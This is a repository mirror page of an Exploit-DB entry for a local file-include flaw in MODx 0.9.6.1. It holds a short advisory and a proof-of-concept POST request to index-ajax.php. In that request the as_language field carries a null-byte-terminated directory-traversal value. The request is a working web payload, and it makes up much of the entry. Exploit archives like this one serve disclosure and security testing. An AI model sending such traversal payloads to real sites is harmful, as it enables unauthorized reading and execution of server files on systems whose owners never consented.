bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/30969.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

12 lines
No EOL
657 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/27097/info
MODx is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks.
MODx 0.9.6.1 is vulnerable to this issue; other versions may also be affected.
Method=POST
Action=http://www.example.com/modx-0.9.6.1/index-ajax.php?
Name=as_language Value=../ajaxSearch_readme.txt%00
Name=q Value=assets/snippets/AjaxSearch/AjaxSearch.php
Reference in a new issue View git blame Copy permalink